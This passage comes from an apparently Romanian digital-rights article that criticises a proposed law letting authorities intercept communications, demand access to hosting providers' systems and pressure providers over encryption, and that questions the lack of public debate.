      Beyond the fact that a provider (including communications providers) would have to build a system for detecting encrypted content in transit, I believe the real target is the providers who offer such services. There are 2 possibilities: either they want the content decrypted directly from the provider, or because they want to break the encryption (how legal or illegal that would be is another discussion); or they want the encrypted content because they intend to somehow obtain or compel disclosure from the party holding the encryption key. These issues, like others in the same spectrum, raise privacy and security questions far too complex to settle in 2 sentences (two links, though: Bugs in our Pockets: The Risks of Client-Side Scanning, and a document leaked from the Commission).

      Not to mention that the text of the Directive being transposed says exactly the opposite – promote encryption, do not undermine it: "the use of encryption, for example end-to-end where appropriate, should be promoted and, where necessary, encryption should be mandatory in accordance with the principles of security and privacy by default and by design".

    • "to allow, in the case of hosting service providers (...), access to their own computer systems, for the purpose of copying or extracting existing data" does not exist in the CPP.

      Terminology just as vague as that of the defunct cybersecurity law (declared unconstitutional in 2015) effectively grants access to any content on any server in Romania under totally unclear conditions. (That is worthy of NSA-grade capabilities.) Want access to a journalist's files? You don't raid the newsroom, you go to the newsroom's hosting provider. The press was already under "national security" threats anyway, right? Capisci?

    V. So: fall in line and register

    Probably to somehow justify its inclusion in this law, the proposal also creates an obligation for these new providers to register with ANCOM, which flagrantly contradicts the applicable European legislation (chiefly the e-commerce directive, implemented in Romania through Law 365/2002). But what does a European obligation matter when "national security" is at stake? What matters is that they can be forced to build, at their own expense, the interception infrastructure, and to hand everything over when a paper arrives from "the organ".

    VI. Conclusion?

    Beyond any substantive debate, proposing such legislative solutions for intercepting communications through the back door, avoiding any public debate, is not only deeply undemocratic but downright insulting to a people, at exactly the moment when that same state should be convincing them that its proposed measures are for their own good, not that they are in fact guinea pigs, including for surveillance measures signed off "the way the mayor signs".

    Or who knows, maybe the Senate, the press or the citizens will wake up and ask some questions: who actually proposed the text? Why now? Why here? Why this text and not another one? Why not in the CPP? Why was there no public debate?

     

    PS: I have attached to the article a document with OCR-ed versions of the relevant texts slipped in after the public consultation, so that you are not forced to search through more than 900 pages of images for exactly where the passages in question are...

     

    Sursa: https://apti.ro/largirea-interceptarii-comunicatiilor-electronice-impusa-pe-sest?
